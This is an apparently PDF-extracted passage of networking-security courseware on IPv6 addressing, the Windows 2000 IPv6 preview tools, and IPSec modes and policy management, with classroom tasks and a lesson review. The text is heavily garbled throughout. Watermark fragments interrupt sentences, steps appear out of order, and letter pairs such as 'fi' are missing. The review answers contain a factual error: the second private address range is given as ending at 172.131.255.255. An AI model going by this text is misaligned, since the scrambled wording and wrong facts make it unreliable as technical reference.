If the need for addressing was not enough of a driving factor to show the need for IPv6, another issue to consider is the IPv4 routing tables. As more and more people, and devices, use the Internet, the routing tables are getting more and more complex. Imagine the routing table once every current IPv4 address is used. Routing will become quite difficult to manage.
Because IPv6 presents a solution to the addressing and other problems that are starting to become prominent on the Internet, we will take a look into the basics of this protocol, starting with the addresses of version 6. An IPv6 address is a 128-bit number, which (for now) is not divided into the classes that are used in IPv4 addressing. The address is written in 8 blocks of 16 bits, using hexadecimal numbering, and separated by a colon. The following two lines are examples of IPv6 addresses: 8ab2:1cc3:2fa4:0:6b8a:31a2:9ef3:85bc 1012:321:544:300:0:0:0:17
PL
IC
AT
iti
on
A few points on the above addresses need to be claried further. There does not need to be a full four characters per block, such as in the address that is all decimal. Additionally, it is possible to identify consecutive blocks of 0 using two colons (::). When the two colons are used, be aware that they can only appear once in an IP address. Using the two colons, the second address from above would look like this: 1012:321:544:300::17 Another type of address that can be present is called the dotted decimal suffix address. This is used during the transition between IPv4 and IPv6. This address combines the traditional IPv4 address with the hexadecimal used in IPv6. An example of this type of address would look like this: ::ffff:192.168.100.23
The nal type of address to investigate is the loopback address. This address is quite different from the IPv4 address of 127.0.0.1. In IPv6, the loopback address is much smaller, and looks like this: ::1
Unicasting and Multicasting
or
DO NO
PL
Link-local unicast address. Link-local addresses have been designed to use on a single link, such as when no routers are present.
IC
Routers in IPv6 networks do not forward packets that are from link-local addresses.
In IPv6, the concepts of broadcasting and multicasting of IPv4 are helpful, but do not directly link the two protocols together on these grounds. For example, in IPv6, there is no broadcast address at all. What are used are unicast, anycast, and multicast addresses. Unicast addresses are identiers for a single interface, and are what packets are addressed to when sent to a specic interface. There are two unicast addresses used in IPv6 that we will address in this topic:
Ed
T DU
Site-local unicast address. Site-local addresses are designed for use by organizations that intend to connect to the Internet, and can be routed.
A multicast address is an identier for a group of interfaces, and are what packets are addressed to when sending to groups of interfaces. Some of the dened addresses for multicasting are: To address all nodes: FF01::1 or FF02::1. To address all router nodes: FF01::2 or FF02::2.
In
In IPv6, when a node is searching for another node on the network, this is called neighbor discovery. The ARP process used in IPv4 is not used in IPv6. Instead, what is used are ICMP and multicasting. Because the process uses ICMP, this allows for more media independence and allows for IP security to be used, versus ARP.
st
The anycast address is also an identier for a group of interfaces. When a packet is sent to an anycast address, it is delivered to one of the interfaces that are identied by the address (often referred to as the nearest one).
ru ct
AT
iti
IPv6 X-casting
on
63
IPv6 Security
One of the advantages that IPv6 presents over IPv4, in addition to the addressspace and routing issues, is security. Although IPv4 allows for the addition of security by using IPSec, it is not mandated. In an IPv6 network, the use of IPSec is much more streamlined, because the functionality is built right in. In IPv6, there are two extension headers that are used to increase security. These two are called the Authentication Header (AH) and the Encapsulating Security Payload (ESP).
Authentication Header: A eld that immediately follows the IP header in an IP datagram and provides authentication and integrity checking for the datagram.
ru ct
1. 2.
Setup: You are logged on to Windows 2000 Server as Administrator.
st
64
In
For the tasks in this topic, you will use IPv6 on Windows 2000. Microsoft has released the IPv6 Technology Preview for educational and research functions. It is not intended for commercial use at this time.
DO
NO
condentiality: Assuring information will be kept secret, with access limited to appropriate persons.
Open the Network And Dial-up Connections Control Panel, and disable the Classroom Hub interface. At the root of your boot partition, create a folder called IPv6test.
DU
PL
authentication: To positively verify the identity of a user, device, or other entity in a computer system, often as a prerequisite to allowing access to resources in a system.
Installing IPv6
IC
TASK 1I-1
or
AT
To install the IPv6 stack on Windows 2000 Professional or Server, you must be running at least SP1 and running the IPv4 stack. To install the stack on Windows 2000 running SP2 or higher, there are a few additional steps that need to be taken to get it running successfully. The IPv6 stack is included with Windows XP, and can be run by entering ipv6 install at the command prompt. The IPv6 stack runs parallel to the existing IPv4 stack, so there should be no conicts.
Ed
ESP: (Encapsulating Security Payload) A mechanism to provide condentiality and integrity protection to IP datagrams.
The Encapsulation Security Payload Header is used to provide both integrity and condentiality on the IPv6 datagrams. In this implementation, the ESP uses Tunnel Mode so that the whole IP packet is encrypted and a new unencrypted IP header is added, and Transport Mode where only the payload is encrypted with options.
iti
The IP Authentication Header (AH) is used for providing authentication and integrity. Keep in mind that since IPv6 datagrams are not encrypted, condentiality is not provided. And, although IPv6 datagrams are not encrypted by default, IPv6 does support multiple authentication techniques and algorithms.
on
3. 4. 5.
Copy the le tpipv6-001205.exe from the location specied by your instructor to the new folder. From the local folder IPv6test, run tpipv6-001205.exe, and extract the les to the same location. Open the Run dialog box, and enter \ipv6test\setup.exe -x, and extract the les to a subfolder of the current folder (for example, \IPv6test\les). Click OK to close the Extraction Complete information box. Start a text editor, and open the le Hotx.inf, which should be in the folder containing the extracted les (\IPv6test\les). In the Version section of the Hotx.inf le, change the line NTServicePackVersion=256 to NTServicePackVersion=512 and save the change. Close the text editor.
Provide students with the location of the IPv6 installation les.
6. 7.
8. 9.
From the folder containing the extracted les (IPv6test\les), run Hotx.exe. When you are prompted to do so, click OK to reboot the computer to Windows 2000 Server. Log back on as Administrator.
10. Right-click My Network Places, and choose Properties.
Ed
T DU PL IC
12. Click the Install button. 13. Select Protocol, and click Add.
15. Click Close twice.
st
In
DO
ru ct
14. Select the Microsoft IPv6 Protocol and click OK.
NO
or
AT
11. Double-click the Ethernet interface thats labeled Partner, and click Properties.
E
65
iti
on
16. Open a command prompt, and enter the command ipv6 if. You should see output resembling the following graphic.
IPv6 Interfaces
or
DO NO
IPv6 Interface Types
ru ct

Interface 3 is a 6-over-4 interface.
Interface 4 is the Ethernet interface.
Interfaces are numbered sequentially in the order created. This numbering will vary from computer to computer.
6-over-4 Interfaces
In
The terms link-local address and link-level address are often used interchangeably.
66
st
Take another look at the output for Interface 3. This interface has a link-layer address of the form a.b.c.d. Now, as far as the OSI Model is concerned, you know that addresses of the form a.b.c.d. are IPv4 Network layer addresses. However, when IPv6 in its present form has to be tunneled over IPv4, the Network layer IPv4 address a.b.c.d. is treated as a link-layer address by IPv6. You will have one 6-over-4 interface for every IPv4 address assigned to your computer. This means that, in the previous example, if you add a second IPv4 address to an interface, such as 192.168.16.1, and run the ipv6 if command again, you will see a fth listing in addition to the other four.
DU
Interface 2 is used for congured tunneling, automatic tunneling, and 6-to-4 tunneling. It is always a pseudo-interface.
PL
In the previous task, when you issued the ipv6 if command, you saw that there are four interfaces, numbered sequentially from 4 to 1. Interface 1 is used for IPv6 loopback. It is always a pseudo-interface.
IC
AT
17. Minimize the command prompt.
Ed
iti
on
Figure 1-21: Additional virtual interface for second IP address.
Ed
T DU PL IC
Ethernet Interfaces
Take another look at the Interface 4 (the Ethernet interface). This interface has a link-local address of fe80::2d0:9ff:fe7f:b21. The format of this address is fe80::2half-the-MAC:ff:fe-the-other-half-of-the-MAC. Of course, the actual method of calculating this value is slightly different, but we will worry about that later. Interfaces that are listed with the traditional, 48-bit, link-layer address are Ethernet interfaces. You should have one Ethernet interface for every Ethernet adapter. The link-local address of the Ethernet interface will use the IPv6 interface identier derived from the MAC address. For example, if the link-level address is 00-20-78-03-a5-b7, then the preferred address is listed as fe80::220:78ff:fe03:a5b7.
st
In
DO
ru ct
NO
or
The link-local address of a 6-over-4 interface is FE80::a.b.c.d, expressed in IPv6 colon-hexadecimal notation. For example, for the IPv4 address 172.27.10.1, the corresponding link-local address is fe80::ac1b:a01 (because 172 = 0xAC, 27=0x1B, 10=0xA, and 1=0x1; therefore 172.27.10.1 = 0xAC1BA01). RFC 2529 provides more information about 6-over-4.
AT
E
67
iti
on
TASK 1I-2
Getting Another 6-over-4 Address
1. 2. 3. 4.
Double-click the Partner interface, and click Properties. Double-click Internet Protocol (TCP/IP).
In the IP Addresses box, click Add.
If you are on the RIGHT side of the classroom, add the IP address 192. 168.28.z. For the value z, use the same value as the last octet of your existing IP address. Leave the subnet mask at 255.255.255.0.
Ed
T DU
If you are on the LEFT side of the classroom, add the IP address 192.168. 26.z. For the value z, use the same value as the last octet of your existing IP address. Leave the subnet mask at 255.255.255.0.
6. 7. 8.
Switch to the command prompt, and enter the ipv6 if command. Verify that the output reects a new 6-over-4 address based on the new IP address you just added. Remove the IP address that you just added.
or
DO NO
IPv6 Utilities
In
68
st
ru ct
IPv6 Utilities
ipsec6 ping6 tracert6 6to4cfg ttcp net
Just as the TCP/IP stack for IPv4 comes with troubleshooting tools such as ping, tracert, and so forth, the IPv6 stack also provides some built-in tools, such as: ipv6
The net command has many subcommands, and their corresponding arguments and options, such as net stop and net start, will enable you to stop or start services. You can use this to stop or start IPv6. You should know that if you stop and start IPv6, you may end up changing interface numbers (after interfaces 1 and 2 are accounted for), because doing this is equivalent to reinitializing the interfaces after a reboot.
PL
IC
AT
5.
Click Add, then click OK three times, and then click Close.
iti
Click Advanced. You should see an IP address listed, such as 172.26.10.z or 172.28.10.z.
on
Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 had been installed, and a command prompt and the Network And Dial-up Connections Control Panel are open.
The ipv6.exe Command

You can use the ipv6.exe command to manually congure interfaces, retrieve information about the state of the interfaces, and so forth. All conguration of IPv6 protocol parameters can be done with this command. You can also use it to query and congure addresses, caches, and routes, by using the many subcommands and their corresponding arguments and options. In fact, you have already used this command with the if option to view information on interfaces.
TASK 1I-3
Interface Initializing
Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 had been installed, and a command prompt is open. 1. 2. 3. 4. At the command prompt, enter net stop tcpip6 to stop the IPv6 stack.
Enter ipv6 if, and observe the response. You should see a message stating that the IPv6 protocol stack could not be accessed. Enter net start tcpip6 to restart the IPv6 stack.
ru ct
st
Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt is open. 1. 2. At the command prompt, enter ipsec6 -? to get help on the ipsec6 command.
3.
In
Observe the explanation for the switches sp and sa. These switches enable you to print the security policy and security associations entries to the screen. Enter ipsec6 sp, and observe the output, which wraps around in your display.
DO
NO
Using the ipsec6 Command
T
TASK 1I-4
DU
You can use the ipsec6.exe command to congure IPSec policies and SAs (Security Associations) for the IPv6 protocol. As with ipv6.exe, the ipsec6.exe has many subcommands, each with its own set of arguments and options. IPSec is covered in greater depth later in the course.
PL
IC
Using the ipsec6.exe Command
or
AT
Enter ipv6 if, and verify that you receive output relating to the interfaces.
Ed
E
69
iti
on
4.
Enter ipsec6 sa, and observe the output, which again wraps around in your display. These entries are quite wide, in terms of the number of ASCII characters used; therefore, you will redirect the output from these commands to text les and use Notepad to view them. Enter ipsec6 sp > sp-out.txt to direct the output to a new le called sp-out.txt. Enter ipsec6 sa > sa-out.txt to direct the output to a new le called sa-out.txt.
5. 6. 7. 8. 9.
Locate the two text les you just created, and open them in Notepad.
In the le sa-out.txt, observe that you do not have a security association. If you want to use IPSec with IPv6, you rst need to create similar text les using the ipsec6 command with the c switch, followed by a le name; for example, ipsec6 c secur. Two les will automatically be created for youone with the extension .spd and the other with the extension .sad which, as you can gure out by now, means that security-policy descriptors need to be entered in the SPD le and security-association descriptors need to be entered in the SAD le.
Using the ping6.exe Command
or
DO NO
ru ct
TASK 1I-5
Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt is open.
In
st
1. 2. 3.
Enter ping -? to get help on the ping command. Enter ping6 -?, and compare the versions of ping for IPv4 and IPv6. Enter ipv6 if.
Using the ping6 Command
DU
PL
You can use the ping6 command with IPv6 just as you use ping with IPv4. By using this command, you send ICMPv6 Echo Request messages, and can evaluate the corresponding replies.
IC
AT
10. Close Notepad.
Ed
iti
In the le sp-out.txt, observe that you do not have a security policy.
on
Record the rst preferred address under the link-local address: Each address will be different. 4. Enter ping6 neighboring_IPv6_address, and observe the output. You should see output similar to the following graphic.
By now, youre probably beginning to wonder how this IPv6 ping packet would be different from an IPv4 ping packet. So lets perform some captures.
Note:For this task, you should work in pairs. 1. 2. 3. 4. 5. 6. 7.
Start a capture.
Click OK.
In
In the command prompt window, enter ping6 neighboring_IPv6_address, and watch the activity taking place with respect to the four echo replies. In Ethereal, stop the capture. Highlight the ICMPv6 Echo Requests and Replies, and view their contents.
DO
In the Interface selection box, select the adapter you want to perform the capture on.
st
NO
On one machine, start Ethereal. (From the Start menu, choose Programs EtherealEthereal.)
DU
Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt is open.
ru ct
PL
Capturing and Analyzing IPv6 Traffic
IC
TASK 1I-6
or
AT
E
71
You can use Network Monitor to perform these captures, if you install the appropriate add-ons, or parsers. We will use Ethereal, however, as the current version (which we installed and examined earlier) includes IPv6 support without having to install any add-ons.
Ed
Capturing and Analyzing IPv6 Traffic
iti
on
8.
What is the Ethertype for IPv6? 0x86dd.
9.
Start another capture.
11. In Ethereal, stop the capture.
13. Observe the differences in contents, compared to the ping6 packets. Note: Perform the rest of this task on all computers.
14. Stop the IPv6 stack by using the net stop tcpip6 command. 15. Re-enable the Classroom Hub interface. 16. Close all open windows.
Ed
T DU
Summary
or
DO NO
In
72
st
ru ct
Lesson Review
Seven. Four. A, B, and C.
In this lesson, you looked deep into the structure of the TCP/IP protocol. You reviewed the RFCs associated with IP, ICMP, TCP, and UDP. You then used Network Monitor and Ethereal to capture and analyze IP packets. You examined captures associated with network traffic. You learned to read the actual data being transmitted between two or more hosts. Finally, you analyzed a complete session, frame-by-frame. You also took a look at a technology preview of IPv6.
1A How many layers are in the OSI Model?
How many layers are in the TCP/IP Model?
What are the assignable classes of IP addresses?
PL
IC
AT
iti
12. Highlight the ICMPv6 Echo Requests and Replies, and view their contents.
on
10. This time, from the neighboring machine, enter tracert6 neighboring_IPv6_ address, and watch the activity taking place with respect to the trace route.
What are the three private ranges of IP addresses, as dened in the RFCs? a. b. c. 10.0.0.0 to 10.255.255.255 172.16.0.0 to 172.131.255.255 192.168.0.0 to 192.168.255.255
1B How many control ags are in a TCP header?

Six. What is the function of an acknowledgement number? To provide an acknowledgement for a received packet. The value is usually tied into the SYN number on the received packet. How many steps are required to establish a TCP connection? Three. How many steps are required to tear down a TCP connection? Four.
What are the two main views of Network Monitor? Display View and Capture View.
Ed
T DU PL IC
Version.
What is the Protocol ID of ICMP in the IP header? 1.
What is the Protocol ID of TCP in the IP header? 6.
What is the Protocol ID of UDP in the IP header? 17.
Type.
st
How many bits make up the Type eld? Eight.
1E What is the rst eld that is read by the computer in the TCP header?
Source Port Number.
In
How many bits make up the Code eld? Eight.
DO
NO
1D What is the rst eld that is read by the computer in the ICMP message?
ru ct
or
AT
1C What is the rst eld that is read by the computer in the IP header?
E
73
iti
on
How many control bits are in the TCP header? Six. How many bits is the Sequence Number? 32. How many bits is the Acknowledgement Number? 32.
1F What is the rst eld that is read by the computer in the UDP header?
Source Port Number.
What is the UDP header and data encapsulated in? An IP datagram.
16.
What is in the payload of the tftp.cap le that you analyzed? Cisco Router Conguration and Access Lists.
By a user sending a large ping. (See the le fragment.txt, in the same folder as fragment.cap, to understand how this was initiated.) Why is there no upper-layer protocol list in the Detail pane for frames 2 through 13?
or
DO NO
ru ct
ICMP.
What was the upper-layer protocol that caused the fragmentation?
1H In the FTP capture le that you analyzed in this topic, what pair of sockets are involved in the initial three-way handshake?
On the client: IP address 172.16.30.2, port 2025. On the FTP Server: IP address 172.16.30.1, port 21. In the FTP capture le that you analyzed in this topic, what pair of sockets are involved in the exchange of FTP data in response to the request for directory listing? On the FTP Server: IP address 172.16.30.1, port 20. On the client: IP address 172.16.30.2, port 2026.
74
In
st
DU
These are the subsequent fragments whose upper-layer protocol is referred to in the rst fragment; therefore, they do not have any header information other than IP.
PL
IC
AT
1G In the fragment.cap le that you analyzed, how do you suppose this fragmentation happened?
Ed
How many bits are both the source and destination port numbers?
iti
on
In the FTP capture le that you analyzed in this topic, what frames indicate that a three-way handshake is taking place between the FTP server and the client in preparation for the sending of FTP data in response to the request for the le textle.txt? Frames 35, 36, and 37.
1I
What is the essential difference between a link-local and a site-local unicast address? The essential difference is that link-local addresses are not routable. Sitelocal addresses can be routed. List some of the utilities provided to you by Microsoft in its IPv6 technology preview. Some of the utilities are ipv6, ipsec6, ping6, tracert6, 6to4cfg, and ttcp.
Filename.spd and lename.sad.
Ed
T DU PL IC
What are the two les required to congure ipsec6 with ipv6 in Windows 2000?
st
In
DO
ru ct
NO
or
AT
E
75
iti
on
Ed or ru ct st
In
DO
NO
DU
PL
IC
AT
iti
on
Implementing IPSec
Overview
In this lesson, you will be introduced to the concepts of IPSec. You will examine and congure the Microsoft Management Console and identify the predened IPSec policies in Windows 2000. You will create new policies and implement IPSec to specically use AH, ESP, or both, in Transport Mode. Finally, you will analyze IPSec traffic in Network Monitor.
LESSON
Objectives
To be able to implement IPSec, you will: 2A
Dene the function of IPSec in a networked environment.
2B
Examine IPSec policy management.
or
DO NO
Given a Windows 2000 computer, you will implement and analyze IPSec AH sessions.
Given a Windows 2000 computer, you will implement and analyze IPSec ESP sessions.
Given a Windows 2000 computer, you will implement and analyze IPSec AH and ESP sessions.
In
st
2E
Implement and examine IPSec AH and ESP congurations.
2D
Implement and examine IPSec ESP congurations.
DU
2C
Implement and examine IPSec AH congurations.
ru ct
PL
Lesson 2: Implementing IPSec
Given a running network, you will examine the IPSec structure, cryptography, the Encapsulating Security Payload, the Authentication Header, the Internet Key Exchange, and modes of implementation.
IC
AT
Given a running network, you will examine the IPSec structure, cryptography, the Encapsulating Security Payload, the Authentication Header, the Internet Key Exchange, and modes of Implementation.
Ed
E
77
iti
on
Data Files newroot.cer Lesson Time 3 hours, 30 minutes
Topic 2A
Internet Protocol Security
The Internet Protocol (IP) by itself has no security. There are no built-in mechanisms to ensure the security of the packets. It has become possible for attackers to create bogus packets, posing as IP addresses that they are not. It has also become possible for attackers to intercept packets as they are transmitted on the Internet, and read into the payload of the packets. Due to the above-mentioned points, there is no way for the security professional to guarantee any of the following: That a packet is from the source IP address. That a packet was not copied or intercepted by a third party during transmission. That a packet holds the original data that was transmitted.
These issues combine to illustrate that security of the packets themselves is required.
IPSec
Integrity means that there is a guarantee that data is not altered between the sender and the receiver. Authentication means that the receiver is guaranteed that the sender is not an imposter.
ru ct st
In
DO
The operation of IPSec is completely transparent to the end-user. This is due to the fact that IPSec functions just above the Network layer (the IPSec protocols AH and ESP have their own IP protocol IDs), so they are well under the Application layer. Providing this automatic protection is signicant in the choice of whether or not to implement IPSec. The end result is that network traffic is encrypted on one end and decrypted on the other, without the upper-layer applications at either end worrying about the complexities of the encryption/decryption processes.
NO
DU
The way that IPSec is able to provide this protection is by specifying how the network traffic is going to be protected, and to whom the traffic will be sent. The way the traffic is going to be protected will be through an IPSec protocol such as the Authentication Header (AH) or the Encapsulating Security Payload (ESP).
PL
IC
or
AT
IPSec, or IP Security (described in detail in RFC 2401) can provide this security. In the simplest denition, IPSec protects IP datagrams. In a more detailed denition, IPSec provides condentiality, integrity, and authentication. Condentiality means there is a system of making the data unreadable by unauthorized individuals.
Ed
iti
on
Cryptography and Keys

IPSec is able to provide protection by encrypting and decrypting data. Although a detailed discussion of cryptography is beyond the scope of this book, the very basics are required. (A detailed discussion and hands-on study of cryptography and encryption techniques will be undertaken in Level 2 of the SCP.) Any le before encryption is typically referred to as plaintext. Once that le is encrypted, using a mathematical algorithm, it is referred to as ciphertext. In order to decrypt this le (or message), you must have a key that can reverse the encryption. You can think of an encryption algorithm as a lock and the key as the locks combination. If a document is locked, you need a key to unlock it. Often in cryptography, one key is used to lock (encrypt) the document, and the same key or a different key is used to unlock (decrypt) the document, depending upon the methodology chosen. If a different key is used, the two keys are linked to each other via the algorithm and the associated mathematical functions. IPSec requires that users have a method of exchanging (sometimes called negotiating) their keys. One method is called manual distribution. In the simplest denition, this literally means each user manually giving every other user his or her key. Manual distribution will more likely be done with what is called a KDC, or Key Distribution Center.
Ed
T DU PL IC
Modes
st
In
Along with specifying a mode, the actual decision on the use of AH and/or ESP (or the other way around) is required. Since there are two modes of implementation, and two protocols that can be selected, there are four possible methods of protection using IPSec. You can use any of the following: ESP in Transport Mode ESP in Tunnel Mode AH in Transport Mode AH in Tunnel Mode
DO
When Transport Mode is used, the IPSec headers (AH and/or ESP) are inserted between the IP header and the TCP header. When Tunnel Mode is used, the IPSec header is inserted between the original IP header (now tunneled) and a new IP header. Tunnel Mode is commonly used to create VPNs between networks.
NO
The other mode is called Tunnel Mode. In this implementation, IPSec protects the entire (tunneled) IP payload.
ru ct
IPSec has the ability to protect either the complete IP packet or just the upperlayer protocols. The distinction between the two creates two different modes of implementation. One mode is called Transport Mode. In this implementation, IPSec is protecting upper-layer protocols.
or
AT
IPSec Modes and Protocols
The second method is automatic distribution. With automatic distribution, the concept is that keys are exchanged only when needed. The default IPSec implementation of automatic key distribution is called Internet Key Exchange (IKE). You can also implement an automated version of the KDC, such as Kerberos implementation.
iti
on
cryptography: The art of science concerning the principles, means, and methods for rendering plaintext unintelligible and for converting encrypted messages into intelligible form.
plaintext: Unencrypted data.
key: A symbol or sequence of symbols (or electrical or mechanical correlates of symbols) applied to text in order to encrypt or decrypt.
79
Over and above that, ESP offers message integrity (authentication) and condentiality (encryption). AH offers only message integrity. Tunnel Mode ESP encryption encrypts all of the tunneled data (that is, tunneled IP header and everything within), while Transport Mode ESP does notand cannotencrypt the IP header. Thus the IPSec implementation that offers the maximum protection is ESP in Tunnel Mode.
ESP in Transport Mode
ESP in Tunnel Mode
Ed
T DU
In
rewall: A system or combination of systems that enforces a boundary between two or more networks. A gateway that limits access between networks in accordance with local security policy. The typical rewall is an inexpensive micro-based UNIX box kept clean of critical data, with many modems and public network ports on it, but just one carefully watched connection back to the rest of the cluster.
st
If true end-to-end security is required between two hosts, then implementing IPSec on each host is the way to go. However, scaling that up to all the hosts in the network can become difficult to implement and manage. Imagine that you and your co-workers all pass open notes to each other in your organization. In order to prevent a third user from seeing the note sent between any two users, you build an infrastructure of opaque PVC pipes between each coworker in your organization. If there are a total of ve workers, you have to
80
DO
ru ct
AH in Tunnel Mode
In Tunnel Mode, AH authenticates application data from one endpoint to another, often network gateways or rewalls. There is no encryption provided, only authentication. If ESP authentication is turned on, then AH is rarely implemented in Tunnel Mode.
IPSec Implementation
As you identied in the previous section, there are various modes of implementing IPSec. One of the primary questions to answer is: Where are the endpoints in your network going to be? Are the endpoints the actual hosts? Or, are the endpoints the rewalls?
NO
PL
AH provides authentication of application data. AH does not provide encryption services like ESP, only authentication services (as the name indicates). In Transport Mode, there is similarity to ESP, though, in that both end users must have IPSec installed and congured.
or
IC
AT
AH in Transport Mode
In Tunnel Mode, ESP encrypts and authenticates application data, just as in Transport Mode. In this situation, the ultimate source and destination IP addresses are also encrypted because they are encapsulated (tunneled). The reason for this is that IPSec is implemented on the tunnel endpoints, and not required on the hosts themselves. If this packet is captured and analyzed by an attacker, the attacker will be able to determine only that a packet was sent. None of the contents, including the original source and destination, can be found freely. Of course, the external IP headers (that of the tunnel endpoints) can be read.
iti
authenticate: To establish the validity of a claimed user or object.
In Transport Mode, ESP encrypts and authenticates application data, such as email, Web pages, and so forth; however, it does not protect the IP addresses. If a packet is captured and analyzed by an attacker, although the data is encrypted, the sender and receiver IP address information is freely available. Both hosts who are in communication must have IPSec installed and congured to prevent this from occurring.
on
have an infrastructure of [5 x (51)]/2or 10 pipes. In this office, each person holds four pipes. Now, increase the number of workers to 100. You will need an infrastructure of [100 x (1001)]/2or 4950 pipes, and each person holds 99 pipes. Lots of secure links to pass things back and forth through, but not that efficient overall.
If host-to-host implementation is chosen, the likely solution will be to use the IPSec function of the OS, such as Windows 2000. If this is the case, IPSec functions normally, at the Network layer, performing its function and moving on.
Ed
T DU PL IC
Yet another option for IPSec implementation is to use a dedicated piece of hardware. This equipment would attach to an interface, or a router, and perform the specic encryption functions externally of other components. This is called a Bump in the Wire implementation. This offers excellent performance in regards to the processing of encryption and decryption. It is not suitable for all implementations, however, as adding a physical dedicated piece of equipment to links may not be a budgetary option for an organization.
Describing the Need for IPSec

1.
Why is IPSec becoming a requirement in networks that need secure communication?
There is no security in the standard IP that is used today. IP can be captured, analyzed, and more with no prevention. IPSec allows for the security of the actual packets themselves, without relying on Application-level encryption.
st
Implementing and managing IPSec policies in Windows is accomplished by using the Microsoft Management Console. In this topic, you will use the MMC to perform the many tasks of IPSec implementation.
The MMC
Microsoft introduced the Microsoft Management Console (MMC) in Windows NT. The MMC is a highly congurable tool used to manage and congure system and application settings.
In
DO
IPSec Policy Management
NO
Topic 2B
ru ct
or
AT
TASK 2A-1
E
81
iti
Sometimes though, IPSec may be implemented underneath an existing implementation of the IP protocol stack, between the native IP and the local network drivers (see RFC 2401). In such a scenario, this is referred to as a Bump in the Stack implementation.
on
This is what happens when you implement IPSec in Transport Modeyou basically create many virtual secure pipes between each host and the rest of the hosts.
Ed
T DU
The Tree and Favorites tabs are located in what is called the Left Pane of the snap-in. This is where the options are expanded, and selected, and possibly added to Favorites. On the right side of the dividing line is what is called the Right Pane. In the Right Pane, you will nd the details of any object that is selected in the Left Pane.
or st
Examining the MMC
Setup: You are logged on to Windows 2000 Server as Administrator.
In
1. 2. 3. 4.
From the Start menu, choose Run. In the Run box, enter mmc to start the Microsoft Management Console. Choose ConsoleAdd/Remove Snap-In. On the Standalone tab, click Add.
82
DO
ru ct
TASK 2B-1
NO
Figure 2-1: The blank MMC console.
PL
IC
AT
iti
In the default plug-in, Console Root, there are two tabs: Tree and Favorites. The Tree tab shows the items that are available in this plug-in. Items can include folders, Web pages, other snap-ins, and more. The Favorites tab is used to manage shortcuts to items in the Console Tree. This enables you to create a customized grouping of tools and shortcuts that you frequently use to manage aspects of your system.
on
In the rst task, you will become familiar with the MMC conguration options and create some customized settings. The MMC, as you rst use it, will be blankyou select the conguration options. In Figure 2-1, you will see that there are two places to use a drop-down menu. The rst is the overall MMC, called Console1 by default. This menu bar has three menus: Console, Window, and Help. The second menu bar contains the commands from the current option, also called a plug-in. The default plug-in is called Console Root. This has three commands: Action, View, and Favorites.
5. 6. 7. 8.
Scroll down, select IP Security Policy Management, and click Add. If necessary, select Local Computer, and click Finish. Click Close to close the Add Standalone Snap-in dialog box.
IPSec Policies
In Windows 2000, there are predened IPSec security policies. These policies allow for implementation of IPSec with minimal effort on the part of the administrator. As an administrator, you must identify the needs for IPSec in your environment, then enable the proper policy to meet those needs. The three predened policies are:
Ed
T DU PL IC
Client (Respond Only)The policy of Client (Respond Only) is used for normal communication, which is not secured. What this means is that any Windows 2000 machine (Professional or Server) with this policy enabled will have the ability to communicate using IPSec if required or requested. Such a machine will not enforce IPSec when initiating communications with any other machine. Secure Server (Require Security)The policy of Secure Server (Require Security) is used when all IP network traffic is secured. What this means is that any Windows 2000 machine (Professional or Server) with this policy enabled will always enforce secure communications using IPSec. It will never fall back to unsecured communications.
Identifying Default IPSec Security Policies
st
1.
In
In the left pane, select IP Security Policies On Local Machine. Three policies are shown in the right pane.
DO
Setup: You are logged on to Windows 2000 Server as Administrator, the MMC is running, and the IP Security Policy Management snap-in has been added.
NO
TASK 2B-2
ru ct
Server (Request Security)The policy of Server (Request Security) is used when IP network traffic is to be secured, and to allow unsecured communication with clients that do not respond to the request. What this means is that any Windows 2000 machine (Professional or Server) with this policy enabled will rst look to enforce communications using IPSec. If the other machine cannot use IPSec, the rst machine will fall back to unsecured communications.
or
AT
E
83
iti
on
security policies: The set of laws, rules, and practices that regulate how an organization manages, protects, and distributes sensitive information. These policies are also available in Windows XP.
Click OK, and leave the MMC open for the next task.
2.
Examine the three policies to see if any are currently assigned.
By default, they are not assigned. 3. Leave the MMC open for the next task.
Saving the Customized MMC Configuration
ru ct
1. 2. 3. 4.
Choose ConsoleExit.
When you are asked if you wish to save the console settings, click Yes. Save the le as ipsec.mmc.msc.
st
The Secure Server (Require Security) Policy

In the following sections, you will examine the settings of each of the three predened policies. The most secure policy, Secure Server (Require Security), is the policy that states that all communication must be secured, with no exceptions.
In
The General Tab

As the name implies, the General tab provides general information and conguration options for the Secure Server (Require Security) policy.
84
DO
You will be using this console repeatedly throughout this lesson, so you might want to create a shortcut for it on the Windows Desktop.
NO
Verify the new addition by choosing (from the Start menu) Programs Administrative Toolsipsec.mmc.msc. Your saved MMC opens just as you had customized it to do so.
DU
PL
Setup: You are logged on to Windows 2000 Server as Administrator, the MMC is running, and the IP Security Policy Management snap-in has been added.
or
Saving a Customized MMC
IC
AT
TASK 2B-3
Ed
Since you have congured the MMC just as you wish, you should save this conguration so that it is easy to bring back up. Although you can go through the steps of adding the snap-in as you did earlier, to do so each time is cumbersome, and is not required.
iti
on
Ed
Strength is determined by the Diffie-Hellman Group, which can be either 96-bit (the low setting) or 128-bit (the high setting) key lengths.
DU
Condentiality is determined by the 3DES or DES algorithm.
ru ct
PL
DES: (Data Encryption Standard) Denition 1: An unclassied crypto algorithm adopted by the National Bureau of Standards for public use. Denition 2: A cryptographic algorithm for the protection of unclassied data, published in Federal Information Processing Standard (FIPS) 46. The DES, which was approved by the National Institute of Standards and Technology (NIST), is intended for public and government use.
These settings work together to determine the integrity, condentiality, and strength of the secured communication. Integrity is determined by the SHA1 or MD5 algorithm.
TASK 2B-4
st
Examining Security Methods
Setup: You are logged on to Windows 2000 Server as Administrator, and the ipsec.mmc.msc console is open.
2. 3.
In
1.
In the right pane, right-click Secure Server (Require Security), and choose Properties. Select the General tab. Observe that the default value for Check For Policy Changes Every is 180 minutes. Every 3 hours, the machine (if it is a domain member) will check with Windows Active Directory to see if this policy, when assigned, has changed.
DO
NO
IC
Figure 2-2: The Key Exchange Security Methods dialog box.
or
AT
E
85
iti
on
Figure 2-2 shows the settings for Key Exchange. Keys are used as part of the different forms of encryption that can be implemented in the IPSec policy. IKE stands for Internet Key Exchange, and deals with the method of exchanging the cryptographic key(s). SHA1 and MD5 are both algorithms that are used to verify the integrity of a message. 3DES and DES are the actual encryption algorithms that can be used, and nally, Diffie-Hellman Group will dictate the overall strength of the encryption.
These algorithms are discussed in detail in the prerequisite courses.
4. 5. 6. 7.
